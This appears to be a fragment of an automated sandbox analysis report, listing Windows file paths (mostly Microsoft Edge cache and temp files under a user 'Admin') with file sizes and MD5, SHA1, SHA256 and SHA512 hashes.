SHA2562e578df6558e1e6edcf5be625815fc8e4a6bd4d477e8bc95fb413c357cfb7886
SHA512134f8e0fc174df685cd68104528f9b762fb3aa8a11ebf030fa7c517e32c776bd20ac4c3fe3005dda2f0a2082885898380cc84757b597576570779fb1e894f04a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
Filesize82B
MD5f3408c434494615539f7c74726cead49
SHA1b5b75ee717baf1db6e8755984b5c8868aa8fa3ea
SHA256f4b71f63fe9fc6e4ceb3633e35264b1568dd3f79c0d90e7ac4a07220acad9b72
SHA512e7ea362b0a86b179747b16b80a96ad4a9f461378e04588c9b5da670bf08e3dcbf25acd0e2f64a5f34b7758f6213fa344442e3b3d03dbb106813278b41c1724a8
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
Filesize155B
MD5b013ae842cebd392a8f0430596010fb2
SHA10ec69525b18ad63d80cde70baa9538f57d8ffab9
SHA2560acbc88b4f1a6dc0955280ac25dd66407348659965b2aeed80630fbd1838cf79
SHA51203f9403576e5c4340d6f0aa32b9b7d650373fd034a434440fa8a3d3c53e4698e7b2f72676685910bd01232acc60b3392d60b4713464f608a26af09011637f3aa
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
Filesize82B
MD5c5581852522152427791cf2f880902cc
SHA1a5dcbd99e9224f7ff55b494125c526c5a927a0d4
SHA2568bd958b61823dd9de93c229cd2aa0a96edf61a5b8c9183e4d5731b77fd5b6d2d
SHA51275155d51a047c1c0faa2aac3d81de6998ffbd07db720aa18eee37b44a3a75ef92883727139d3a2a499cdac88ecc2a371d081129027e316cda5018b7aa9328e09
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
Filesize146B
MD5632aa74645f7707fb340062203027d96
SHA117b699a1e9ccc10bb6969368a00ff399e1de2d8f
SHA256b22a84196ec24c80276de6cf9f3c3e838d7f68d20dc33ae8f4942714b5d486b3
SHA512176d7898573b7726e351d465e0fdbc6f936c5e7d05538764ab559973c09709fde57cf9c00c7a1f32789c6e11231788f11dba42cbe480b49ffd70680905320f43
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
Filesize26B
MD52892eee3e20e19a9ba77be6913508a54
SHA17c4ef82faa28393c739c517d706ac6919a8ffc49
SHA2564f110831bb434c728a6895190323d159df6d531be8c4bb7109864eeb7c989ff2
SHA512b13a336db33299ab3405e13811e3ed9e5a18542e5d835f2b7130a6ff4c22f74272002fc43e7d9f94ac3aa6a4d53518f87f25d90c29e0d286b6470667ea9336ae
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
Filesize153B
MD512c5142c869726fb864574f61d213674
SHA18301c362c64f763d776acd482d4d203aff908e4a
SHA256755e32cf2692786dd3ccb810653e207e03d892661b32a8f63a3bff8443ad751d
SHA51222010700e549642ed5d64534616ed5b621748150e742d3afa47c2780210748d6e1edf2a501ba25004dff5d757d2e3dc6b8a766f3d5b1f73df40a7bd1644d4d58
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\4cb013792b196a35_0
Filesize17KB
MD5f63137cd94333d89ac40a43cd546cd15
SHA1771dd95e3220e53189c87d70d2aab4b86f1ecc61
SHA256d759dc2458ce9e75d45e7c2e9c596c46005268e438e929d9738d1dbc5f34231a
SHA512a9e0655dbb1e80f68c8d27ccfbda76252819e343bd666c2b76f172f92399f7bf215f4718d1a8e69cb87f99da72bb59fe707fd24885456b9122a19e4053d9e1f8
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\4cb013792b196a35_1
Filesize11KB
MD5ec148531803043faba2866d17969240b
SHA10f913fd68dd0afbc0889db68d233c433b6757411
SHA256b153126aaba041b9666153edb4f5225ece28294a0688631fc651e66d23438529
SHA5122915b0e4f2244c19955d47b367b72e17c9bc8ab267a9c64dcb132919fbd126928230f244d7bad3f9452ac6a00c549900c655b25b86ee063b9c3faf331db8dae9
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\f1cdccba37924bda_0
Filesize162KB
MD5733c86e04193fa5fb65a1131d96398dc
SHA12d40564d2ae02aef2ba07e773ab7d14cf15f8584
SHA25635afd7982caea8334eb9cb22418d93bf803c68bf4844cad88b84fe6a062699a5
SHA5127cca88834a0fac24b7d6130fb3420cd6d1320a782437be475e379ef828380eae3e4cdd7a6d0ff9c5dc4fdd582bf884227701b8ac8060308cd6e4913332a73eba
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\f1cdccba37924bda_1
Filesize392KB
MD5379fcb4ff25b21f79b0f4f38ffa40f97
SHA1b7a540a1c964d2fa3da9f5f49826fc5be665f18b
SHA256bb0976ffe74a8a335bc001c257beefe8049c8306b64c9863de57197c14b60b0c
SHA5127f675aba14f720a9526fb25c7876e0777bb9f326056fd161fee5abfa5ca9a6378dd85976e6ad792441325202e2685b5bdf3a654ee24a8fb8b268f8a7b71b09ba
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
Filesize96B
MD5eeb30f4e9c4b71fb629ddff57ad3b65b
SHA11507333a6f0534d5a467a8db45d7f4b22335e044
SHA2567713231cfa57a7455dfb6791ea711aced1742060e376f920fedb7bef7298a8e4
SHA512f881580e9c88ccf25831838298569d0b56a3ac29ee3b2c537a1f9883f6a90164390c7a5a8fbf3575abefcab556e4a3253aab762556b539d48e78efdcc5310c2f
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe58f279.TMP
Filesize48B
MD56d91d2f267a68eb2cd18ba8d121d649f
SHA1da2a38eac92b079d78b28b531e6a142b65cd7da2
SHA25640a088ca38b898222f0b949e2cf903b1cf89d24fc2ebe697dc4d19f9960785d5
SHA512f76bed625a53024d556c917e19e663605e64b214ebbe916278744ccf35556be8ce244274aeeea5173aaa7bc144c595ef82131d8237cb7b1fa4d1ab75a21a4ea0
-
Filesize
1KB
MD572a72a1a40fc43a573a61fb93696fb6e
SHA1d8a6c762dd4c5299fe99c026980f21165c1b2953
SHA25623185c5a5c56fff38b564833fb61f79394a194b9e85c2566b26c8632db83d48d
SHA51272df4350e1458418329e18d0141abd9d2170ad784d1eec219e87141bf1006d171e7c07873059b4d612b7a43feb511a685dfc33e396c8dc0e9a7200365a9424e8
-
Filesize
2KB
MD5da0d95e67801694d65932deea38cf23f
SHA14e46f11544f202cf02d3b1da00b33137ab280b62
SHA256ad486857703cf5af5d160fa1d0550dac8aede77c2c7bb4cfcc8e455f8c0a0e01
SHA512a5303934a70ede77c27d07903079eb98fc477316836e429cdbdc880ca77069bd731686a1f4b3acf73f2e0d5db53caf4a3d00a6ed24edf31eb4f4d342d89d4adf
-
Filesize
3KB
MD53654dafaa9c165f45afd5b95fffb991e
SHA132566ce0906359ad2c9bedd2399eae989394d083
SHA2565bd53093f4a8faa0b9f92fe650891f22c11e0c9c4488afc9eb2baab67f298fbb
SHA5128938d095ecb3a0ace6a897f0b8f283c123b91ac07ea70d1c9effcea9e0e313f3216dc321a479dfc84996e9a393e89363ad3bc9725747f265078328516f7b9f4a
-
Filesize
6KB
MD53f4c20214e6ff0314fbcb9b24a4bc980
SHA126acd5655c9bbed2177439162c3d4aacd64d5d90
SHA256aefe830149d16f5aa36d99f1ea0a5cc1783f4d3333bc96c4e9e4a6014500202a
SHA512c909a995e5c7a1820c241c72f516fadd74e8f3b67d6e0f6d6e43469eac08b1d48a8ee15e9f2ea54a0f95bbae4090c7ca77d17d5eb3a576307ae5652722e861d0
-
Filesize
1KB
MD52e4205207f82159f574a5886ae84c703
SHA16b5e3e8831ac346d96e6e16647dd8b258242a758
SHA256e3c22a30229e41078ceb83df15369ea20660f0ec4ff302d5adf947da35fcd0c6
SHA5129b41694d781279ab4ed9999b60a61d9471bf6fbc7e38d6fca786218b59b5801b225464ff7761b0ad06d79b32b25762881bd91b18e7ac0727b027b526cafaf611
-
Filesize
534B
MD59df69d6ae9954a64226a91ad4fa5b668
SHA1ff7438148a3c4a198c283463928e031236c39d13
SHA256b83255eace3501fa1b8541f1ddc4d9e14908c2b28cdbd1cd8cc998e94a68b062
SHA51292a7573fd239654c199ea1d597629848ed7359af98a9e6d4a9ec538b556ff40f0b0d6f70d80ded7a21b56d52c6aebedd37bc2d92fd21a1e5056f45a8c22cfab3
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\b759842c-123f-4026-8346-d3ed8bef6af4.tmp
Filesize1KB
MD50d2cdc820346eaccf81d034623630e78
SHA1cea44837af18fc528db1901b9af8e0df8c7d6200
SHA2560eced658f8445ec03d8071d942e531320df71964d70ebeb4bdf1793042b78daa
SHA512e53fd1d827f62ffed5dd032038c07e4ec2d2f64c88dfa1a688397f4fefd8d25eff0ee118c711d939cb2a5fae1ba227215b9f373d3c13f08d4424db755d1f39a7
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
11KB
MD5df9b16f254ab4b40b9207898a97c8116
SHA12f42588dcc177694fec404cc82497ce79b893e89
SHA2563b8fb7e5d43b5d51e1d36afe8e66e8155c2406c208283dd6574d252b02ffc553
SHA5126e35620d8db5675734fb0f9d539464993057c07266363e66306afceb741728e3ec5b321dad849444b2e67f52ea41ab24e6955bd6b1e587e8319bdc91ee65d4e5
-
Filesize
12KB
MD5cc5f5a5680970b4c81d9847768bba32e
SHA1e05ab4fbbfdb7dedb95f3ac7da8dc4091b0a9a6c
SHA2560f7c89e1ef8d2b10ab02cdfdb5738517a3e80f140d84b643a977f7e06c182761
SHA512a20a3be1b54177382d9ea568252c88dbedbb5966b15062eb7e4d12314f3dff8999d51492835d835d2c009702f1006e408d1e9137931da1cc60b542fb4a8131f5
-
Filesize
2.5MB
MD5b2e6a3d0bf3320b759c464ae6fa5b735
SHA1cc9f5de7742b9c11f7c0c0e3f9d39b0c16b38cc1
SHA256771b76ba28496c56d1d9c0fe67fdf7688a2f1b12a9eb428050551338945337a3
SHA512bf2f09aebf6d4b07ec06ce37617361e149b26d7fc2f5c0715a5e479747eb5b1f8fc615c90d1e4d8d751e05dd566819facfef8a00cfb7acb61ec588b0c23b022a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.6MB
MD572491c7b87a7c2dd350b727444f13bb4
SHA11e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA25634ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511
-
Filesize
458KB
MD5619f7135621b50fd1900ff24aade1524
SHA16c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA5122c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628
-
Filesize
2.2MB
MD56dd7f70cddc4310e047032d70550f72c
SHA1e93c0d3a03dbe51eba117ea8e10bd0e8b6b27562
SHA256e92508881b6d69c45897a58b4c7dc58ee68e438979604d7f7b6f6ff71f15444d
SHA5121e6398a9739f57a3cf754a6e73f92cf67fe117440a6afe698767c578f396a4b8dab93b5568d02fa23fbcd3565b9017254625d58b1ea7a375c8537f2bab90f42c
-
Filesize
21KB
MD54265bf9f9535ebb4e1830e2a50589285
SHA1ddc45fe277a3b39179dd9e39e17d71b50a184607
SHA256c07698b4c960b60d8a3c661887d6cc1f7fe74e31a24d4c2ae95d52d1c92ce403
SHA5123a7a0a8a6b82d5e1b6c06c12250eb9b347ed024811467d6da5123f6d07a79836a4e414758cb5c708d0c96cc4a020f8743b2c1e4fa5f5ed448fc087772ab592be
-
Filesize
9KB
MD518f4fe969c4ba0517b403e28f7ad2b72
SHA19df09751ee1246db2ed6b6ed6fec87fb0891e077
SHA25606d1004f28a87b42b1d7ac23ff2e4b43d736295abc2e84740504386f40a041f4
SHA5129847b8e2b849b09a76e22ab0d76a1a7d29079676dbdf4277b712709af0ac6a6f0e3a473f144f0a8e247861111357027a758b95e4d096d24cec160192c5da32a4
-
Filesize
9KB
MD5a915fd2a4e2750ee9003e628294bf284
SHA1f9adc1e65fc3d2cf39b2c5a89030f3225e21616d
SHA2565e2e339dbee22d6c05d652646071bc81ad96a6422eb311453ca3905e7dfea285
SHA512044d5370ec915fb488cf77c1b181f5a4f89833028266f922766b782ff445f61ab85b92980d6939d0e252a368eb846def27bcdea7f029999d6854a90c793b3a5f
-
Filesize
9KB
MD54a5f569872c858ede1c0c67500cfdd6d
SHA1cdcac69d89b45a7903198467c2d2d32126c31661
SHA25688b2d9a82c911ad61f3570aa31b360ae1649b117f6495459698d724f0c9638dc
SHA512d9c6776829def517a253e9c60d0316dbc03092f850383305089dc1110b1abd19668ae47dca8188e96c6f12b66a8e5b5a783901f2115cadd5c1accf019c3bdb40
-
Filesize
9KB
MD56f7f4f7ed739e3ac5eee8d0876ff76d4
SHA19a65d52885624dc47f342b5a9875d7720540c755
SHA256b61a321a8a1f4ca1d8c52a1ad0464ac5882073ac8da7c5585f04ce2330b78acc
SHA51235cad901c3f77c58803372a2f230701469d99fb9d8b16d82b59416a62d215614ab044dcae123473cc5d9a4a09e23f2edaac53ef82bbd5b3556b9b187cff50021
-
Filesize
9KB
MD5870a5535c79edcf782551514f48d89ab
SHA1333d814d65753cdc4c4e8fb587c09af6960110d1
SHA256814a92267e0d8867932afd625f2f8e55b04b88b2cfc31e91b6e45e473f1b057d
SHA512f8743ca2f1ef2433b41adc41adf6a5836c1901bda70d5d76301cb06b471796b360544efa591c49b3a7d09eee12cef7ba20e79571f50d891d4729598210772b06
-
Filesize
1.6MB
MD5a62944686498212b290eae637729a151
SHA12053660850d3f578f7b31e5ced16069d6f9c4ee0
SHA2560bb07f0caab7e5539e7efeca5bee359d9f6b49237e0c908981d9168680fe2b3e
SHA512ae6abd482552445cbf8c308948519227b0d1a82c1b3adb4800f8c9ac32c519c8d0aee8f3b4caada26d1976b63b032aad72d95e574adf205b947dada23a5b8ad3
-
Filesize
1.6MB
MD5716459a6ceac7d310d4227ea3e9ddb59
SHA1fa27addf18c197bf5fc054bfb5ae57de1caf3382
SHA256ba5270891d3eef832fe34f9d67fbbb30ceb3873552ea859139914a6a783b0aa1
SHA5123857cc099edd99f1c20d4c4456ec4577478afcbdb6073852c6df10775a4e6de0316ab68c6dacb7212d27f49057312ba1aeb0c35e695d84832f3e9f8d61f7d8c1
-
Filesize
474B
MD5893874465a8d9f68f0684fd61e9f1d3c
SHA1866a58255ebab05d4ee2f2ed8383a6555ac1df03
SHA256e0855b82ec99b14bdfa38dacf90dadb2071e0d413c6559c752e0b2c6e8cd08c0
SHA5121cc878a3236a5ce4f3a89fae580b4d16a7842fd03dfe0a2c7d1d5da5be822528ea3826f659a70de727c9307fb15997f56b7204582043dc7efcc6c818f7aa2bd7
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
Filesize11KB
MD564a52b81eebb07f52e1a1678989f3246
SHA10405347a8f51aedc1bef9db1ed3688915fe6df3d
SHA256bf227675280b4ec00fe7d6598aaa105ae33519962689e58d5f7cc0f33f22e063
SHA512870dda8564fe06fe880755b50c73f23c6e1a4f4249485509577c556985de193fd047f936b621aa2a4a9dd94534380e57902ee64056896cf88a7ee0ba752fdb90
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
Filesize11KB
MD5bfee4a36e3a67cd1970c80d2129b15f0
SHA1783f03254996988e559258690f6228dd1a6f30db
SHA256d2367455dfe25fcdeb824550e45a7176140472cf12a36df7a1d2b0196f8d21d4
SHA512d7c9a7cc744a5bc0b2bbb91e497638b7ae9d315ae8ca77291e8fb994556675960a15b2b6b2973171b9c215c97e5f84744dc5a1856cc58a202ff1ff79defd2b04
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e